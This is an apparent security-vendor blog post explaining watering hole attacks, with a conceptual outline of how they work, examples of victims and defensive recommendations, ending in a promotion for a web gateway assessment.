A Watering Hole attack is a method in which the attacker seeks to compromise a specific group of end users by infecting websites that members of that group are known to visit.

A Watering Hole attack is a method in which the attacker seeks to compromise a specific group of end users by infecting websites that members of that group are known to visit. The attacks have been adopted by criminals, APT groups and nation states alike and we see the amounts rising. The goal is to infect a victim’s computer and gain access to the network within the victims’s place of employment. Many conclude that these attacks   are an alternative to Spear Phishing but are quite different. Watering Hole attacks are still targeted attacks, but they cast a wider net and trap more victims than the attacker’s original objective. Despite this, Cyber security professionals don’t see this as the end of Spear Phishing.

What is a “Watering Hole” Attack?

Phishing is like giving random people poisoned candy and hoping they eat it, but a Watering Hole attack is like poisoning the village water supply and just waiting for them to drink from it.

The name is inspired by the predators in the wild who prowl near watering holes, waiting for the opportunity to attack a potential prey. In a Watering Hole attack, the “predator” (Attacker) lurks on specific websites which are popular to its “prey” (target), looking for opportunities to infect them with malware making these targets vulnerable. In other words, rather than using a Spear Phishing email campaign to lure victims, hackers infect vulnerable sites that share a common interest to their targets, and then redirects the victim(s) to the attacker’s site which contains malware.

The objectives for performing this attack include stealing banking credentials, personal information or intellectual property, but also to gain access to sensitive computer systems. As attackers compromise legitimate websites that cannot be blacklisted and use zero-day exploits which have no antivirus signatures, the attack success rate remains high.

Although Watering Hole attacks are still not as common as others, they pose a considerable threat since they are difficult to detect. These attacks typically target high-security organizations through their employees, business partners, connected vendors and even unsecured wireless networks at conventions.


Who Has Been Affected by Watering Hole Attacks?

Some reported victims of this attack method include mobile developers from Facebook, Apple and Twitter which were hit by a malware hosted on a popular iOS mobile developer forum. They are not the only ones; regional banks, activist groups, government foreign policy resource sites, manufacturers, defense organizations, and many other companies from different industries.The Watering Hole attack method has been used on and off in recent years and it dates back to 2009.


How does a Watering Hole attack work?

Watering Hole - Diagram-2


  1. First, the attackers profile their targets by industry, job title, etc. This helps them determine the type of websites often visited by the employees or members of their targeted entity.
  2. The attacker then looks for vulnerabilities in these websites and injects malicious code that redirects the targets to a separate site where the malware is hosted.
  3. The exploit drops the malware onto the system of the target.
  4. The attacker now uses the dropped malware to initiate its malicious activities.
  5. Once the victim’s machines are compromised, the attackers will perform lateral movements within the victim’s network and ultimately will exfiltrate data.

What can I do to prevent these attacks?

  • Test your current security solutions to verify that they provide you with defense while browsing the internet from the organization, that no malwares and rootkits can be downloaded from the organization and that you cannot access infected websites.
  • It is vital that organizations seek additional layers of advanced threat protection such as behavioral analysis, which have a far greater likelihood of detecting zero-day threats.
  • Update systems with the latest software and OS patches offered by vendors.
  • All third-party traffic must be treated as untrusted until otherwise verified. It should not matter if content comes from a partner site or a popular Internet property such as a Google domain.
  • Use a web gateway solution to test your HTTP/HTTPS outbound exposure to malicious or compromised websites.


This attack is sure to continue as attackers leverage legitimate resources as a catalyst for attacks. This includes influencing search engine results, posting on popular social networks and hosting malware on trusted file sharing sites.

Send the request to download Cymulate’s Web Gateway Assessment for free to see your organization’s outbound exposure to malicious or compromised websites.